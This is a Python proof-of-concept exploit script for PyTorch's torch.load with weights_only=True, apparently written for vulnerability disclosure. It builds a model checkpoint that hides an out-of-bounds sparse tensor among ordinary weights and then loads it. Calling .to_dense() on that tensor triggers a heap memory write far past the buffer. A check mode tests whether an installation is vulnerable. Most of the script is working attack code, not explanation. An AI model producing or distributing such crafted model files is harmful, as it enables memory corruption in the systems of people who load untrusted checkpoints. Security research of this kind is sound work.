#!/usr/bin/env python3
"""
PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True)
This PoC demonstrates that a crafted .pt file containing a sparse tensor
with out-of-bounds indices can be loaded with weights_only=True (the default
safe mode) and cause heap memory corruption when the tensor is used.
The root cause is that _validate_loaded_sparse_tensors() skips validation
when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0).
IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor.
AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0)
Usage:
python poc_sparse_oob.py --create # Creates malicious_model.pt
python poc_sparse_oob.py --load # Loads and triggers the bug
python poc_sparse_oob.py --check # Checks if current PyTorch is vulnerable
"""
import argparse
import sys
import os
def check_vulnerability():
    """Check whether the installed PyTorch is vulnerable to this vector.

    Performs three checks:
      1. sparse tensor invariant checking must be disabled (the default),
      2. ``_rebuild_sparse_tensor`` must be on the weights_only allowlist,
      3. ``_validate_loaded_sparse_tensors()`` must actually skip validation.

    Returns:
        bool: True if all three conditions hold (i.e. vulnerable), else False.
    """
    try:
        import torch
    except ImportError:
        print("[!] PyTorch is not installed. Install it to test.")
        return False

    print(f"[*] PyTorch version: {torch.__version__}")

    # Check 1: Is check_sparse_tensor_invariants disabled?
    invariants_enabled = torch.sparse.check_sparse_tensor_invariants.is_enabled()
    print(f"[*] Sparse tensor invariant checks enabled: {invariants_enabled}")
    if invariants_enabled:
        print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.")
        print("    This means _validate_loaded_sparse_tensors() will catch OOB indices.")
        return False

    # Check 2: Is _rebuild_sparse_tensor in the weights_only allowlist?
    from torch._weights_only_unpickler import _get_allowed_globals
    allowed = _get_allowed_globals()
    rebuild_sparse_key = "torch._utils._rebuild_sparse_tensor"
    if rebuild_sparse_key in allowed:
        print("[*] _rebuild_sparse_tensor IS in the weights_only allowlist")
    else:
        print("[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist")
        print("    NOT VULNERABLE via this vector.")
        return False

    # Check 3: Verify _validate_loaded_sparse_tensors skips validation.
    # BUGFIX: the probe tensor must be INVALID (OOB index). The original code
    # used a valid dummy, so the list was cleared whether or not validation ran
    # and the two cases could not be told apart. With an OOB probe, a
    # validating implementation raises; a skipping one silently clears the list.
    from torch._utils import _sparse_tensors_to_validate, _validate_loaded_sparse_tensors
    probe = torch.sparse_coo_tensor(
        torch.tensor([[99]]),   # index 99 is out of bounds for size (10,)
        torch.tensor([1.0]),
        (10,),
        check_invariants=False,
    )
    _sparse_tensors_to_validate.append(probe)
    try:
        _validate_loaded_sparse_tensors()
    except Exception:
        # Validation ran and rejected the OOB probe -> patched behavior.
        print("[*] _validate_loaded_sparse_tensors() performed validation")
        _sparse_tensors_to_validate.clear()  # don't leave the probe behind
        return False

    if len(_sparse_tensors_to_validate) == 0:
        # List cleared without complaint about an OOB index -> validation skipped.
        print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (list cleared)")
        print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!")
        return True
    print("[*] _validate_loaded_sparse_tensors() performed validation")
    _sparse_tensors_to_validate.clear()
    return False
def create_malicious_model(output_path="malicious_model.pt"):
    """Write a checkpoint whose 'sparse_layer' entry carries OOB sparse indices.

    The sparse COO tensor declares size (10,) while one of its indices is
    999999; densifying it later writes far past the dense buffer's end.

    Args:
        output_path: Destination for the crafted .pt file.

    Returns:
        str: The path the file was written to.
    """
    import torch

    print(f"[*] Creating malicious model file: {output_path}")

    bad_indices = torch.tensor([[0, 7, 999999]])  # 999999 is OOB for size 10
    bad_values = torch.tensor([1.0, 2.0, 3.0])
    declared_size = torch.Size([10])

    # Construct with every layer of invariant checking switched off so the
    # inconsistent indices survive into the saved file.
    with torch.sparse.check_sparse_tensor_invariants(False):
        evil_sparse = torch.sparse_coo_tensor(
            bad_indices, bad_values, declared_size, check_invariants=False
        )

    # Standard-looking state dict: two benign dense tensors plus the payload.
    checkpoint = {
        "weight": torch.randn(10, 10),
        "bias": torch.randn(10),
        "sparse_layer": evil_sparse,
    }
    torch.save(checkpoint, output_path)

    print(f"[+] Malicious model saved to {output_path}")
    print(f"    File size: {os.path.getsize(output_path)} bytes")
    print(f"[*] The 'sparse_layer' key contains a sparse tensor with OOB indices")
    print(f"    Declared size: {declared_size}")
    print(f"    Max index in indices: {bad_indices.max().item()}")
    return output_path
def load_and_trigger(model_path="malicious_model.pt"):
    """Load the crafted checkpoint in default safe mode and poke the bug.

    Loads with weights_only=True (which still admits sparse tensors), prints
    the loaded tensor's inconsistent metadata, then — after interactive
    confirmation — calls .to_dense(), which may corrupt the heap or crash.

    Args:
        model_path: Path to the file produced by create_malicious_model().
    """
    import torch

    print(f"[*] Loading model from: {model_path}")
    print(f"[*] Using weights_only=True (the default safe mode)")

    # Expected to succeed: the sparse rebuild helper is allowlisted.
    ckpt = torch.load(model_path, weights_only=True)
    print(f"[+] Model loaded successfully with weights_only=True")
    print(f"[*] Keys in state_dict: {list(ckpt.keys())}")

    payload = ckpt["sparse_layer"]
    print(f"[*] Sparse tensor loaded:")
    print(f"    Layout: {payload.layout}")
    print(f"    Size: {payload.size()}")
    print(f"    Indices shape: {payload._indices().shape}")
    print(f"    Max index: {payload._indices().max().item()}")
    print(f"    Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}")
    print()
    print("[!] About to call .to_dense() -- this will trigger OOB memory write!")
    print("[!] The tensor has index 999999 but size is only 10")
    print("[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end")
    print()

    # Deliberately interactive: the next call can corrupt memory or abort.
    input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ")
    try:
        densified = payload.to_dense()
    except Exception as exc:
        print(f"[!] Exception during to_dense(): {type(exc).__name__}: {exc}")
    else:
        print(f"[!] to_dense() completed (memory may be corrupted)")
        print(f"    Dense shape: {densified.shape}")
        print(f"    Dense values: {densified}")
def main():
    """CLI entry point: run the PoC stage(s) selected on the command line.

    With no flags, prints usage and returns. ``--check`` short-circuits and
    exits the process (status 0 = vulnerable, 1 = not vulnerable).
    """
    cli = argparse.ArgumentParser(
        description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)"
    )
    cli.add_argument("--create", action="store_true",
                     help="Create the malicious model file")
    cli.add_argument("--load", action="store_true",
                     help="Load the malicious model and trigger the bug")
    cli.add_argument("--check", action="store_true",
                     help="Check if the current PyTorch is vulnerable")
    cli.add_argument("--output", default="malicious_model.pt",
                     help="Output path for the malicious model file")
    opts = cli.parse_args()

    # Guard clause: no mode selected -> show help and stop.
    if not (opts.create or opts.load or opts.check):
        cli.print_help()
        return

    if opts.check:
        sys.exit(0 if check_vulnerability() else 1)
    if opts.create:
        create_malicious_model(opts.output)
    if opts.load:
        load_and_trigger(opts.output)


if __name__ == "__main__":
    main()